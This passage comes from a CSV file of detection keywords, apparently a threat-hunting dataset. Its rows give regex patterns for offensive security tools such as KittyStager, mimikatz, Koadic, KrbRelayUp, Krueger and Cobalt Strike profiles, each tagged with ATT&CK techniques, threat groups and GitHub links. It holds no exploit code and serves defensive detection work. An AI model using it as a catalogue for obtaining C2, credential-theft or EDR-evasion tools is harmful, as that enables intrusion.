INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8374"
"*/kittens/haloKitten*",".{0,1000}\/kittens\/haloKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","8375"
"*/kittens/recycleKitten*",".{0,1000}\/kittens\/recycleKitten.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","8376"
"*/KittyStager/*",".{0,1000}\/KittyStager\/.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","8377"
"*/kiwi.rb*",".{0,1000}\/kiwi\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8378"
"*/kiwi_passwords.yar*",".{0,1000}\/kiwi_passwords\.yar.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8379"
"*/klezVirus/CandyPotato*",".{0,1000}\/klezVirus\/CandyPotato.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","8380"
"*/klg.ps1*",".{0,1000}\/klg\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","8381"
"*/knowsmore.cmd*",".{0,1000}\/knowsmore\.cmd.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","8382"
"*/knowsmore.db*",".{0,1000}\/knowsmore\.db.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","8383"
"*/knowsmore.git*",".{0,1000}\/knowsmore\.git.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","8384"
"*/knowsmore.py*",".{0,1000}\/knowsmore\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","8385"
"*/knqyf263/CVE-2022-0847*",".{0,1000}\/knqyf263\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/knqyf263/CVE-2022-0847","1","1","N/A","N/A","N/A","1","47","9","2022-03-08T13:54:08Z","2022-03-08T13:48:55Z","8386"
"*/knx-gateway-discover.nse*",".{0,1000}\/knx\-gateway\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8387"
"*/knx-gateway-info.nse*",".{0,1000}\/knx\-gateway\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8388"
"*/Koadic*",".{0,1000}\/Koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/zerosum0x0/koadic","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8389"
"*/koadic.git*",".{0,1000}\/koadic\.git.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8390"
"*/Koppeling.git*",".{0,1000}\/Koppeling\.git.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","8391"
"*/kost/revsocks/releases*",".{0,1000}\/kost\/revsocks\/releases.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","8392"
"*/KrakenMask.git*",".{0,1000}\/KrakenMask\.git.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","N/A","9","3","N/A","N/A","N/A","N/A","8393"
"*/krb5/*.py",".{0,1000}\/krb5\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8394"
"*/krb5-enum-users.nse*",".{0,1000}\/krb5\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8395"
"*/krbjack.git*",".{0,1000}\/krbjack\.git.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","8396"
"*/KrbRelay*",".{0,1000}\/KrbRelay.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","8397"
"*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8398"
"*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","1","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","8399"
"*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","8400"
"*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8401"
"*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","8402"
"*/KrbRelay-SMBServer.git*",".{0,1000}\/KrbRelay\-SMBServer\.git.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","1","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","8403"
"*/KrbRelay-SMBServer/releases/*",".{0,1000}\/KrbRelay\-SMBServer\/releases\/.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","1","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","8404"
"*/KrbRelayUp.exe*",".{0,1000}\/KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Back Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8405"
"*/KrbRelayUp.exe*",".{0,1000}\/KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","8406"
"*/KrbRelayUp.exe*",".{0,1000}\/KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8407"
"*/KrbRelayUp.exe*",".{0,1000}\/KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","8408"
"*/KrbRelayUp.git*",".{0,1000}\/KrbRelayUp\.git.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","8409"
"*/krbrelayx*",".{0,1000}\/krbrelayx.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","8410"
"*/KRBUACBypass*",".{0,1000}\/KRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","8411"
"*/KRBUACBypass.git*",".{0,1000}\/KRBUACBypass\.git.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","8412"
"*/kronos.profile*",".{0,1000}\/kronos\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","8413"
"*/Krueger.exe*",".{0,1000}\/Krueger\.exe.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","1","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","8414"
"*/Krueger.git*",".{0,1000}\/Krueger\.git.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","1","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","8415"
"*/kubesploit.git*",".{0,1000}\/kubesploit\.git.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","8416"
"*/Kubestroyer.git*",".{0,1000}\/Kubestroyer\.git.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","1","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","8417"
"*/L0ading-x/cve-2022-23131*",".{0,1000}\/L0ading\-x\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/L0ading-x/cve-2022-23131","1","1","N/A","N/A","N/A","1","29","12","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z","8418"
"*/label-date-lsass.dmp*",".{0,1000}\/label\-date\-lsass\.dmp.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#content","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","8419"
"*/laconicwolf/burp-extensions*",".{0,1000}\/laconicwolf\/burp\-extensions.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","8420"
"*/Ladon.exe*",".{0,1000}\/Ladon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8421"
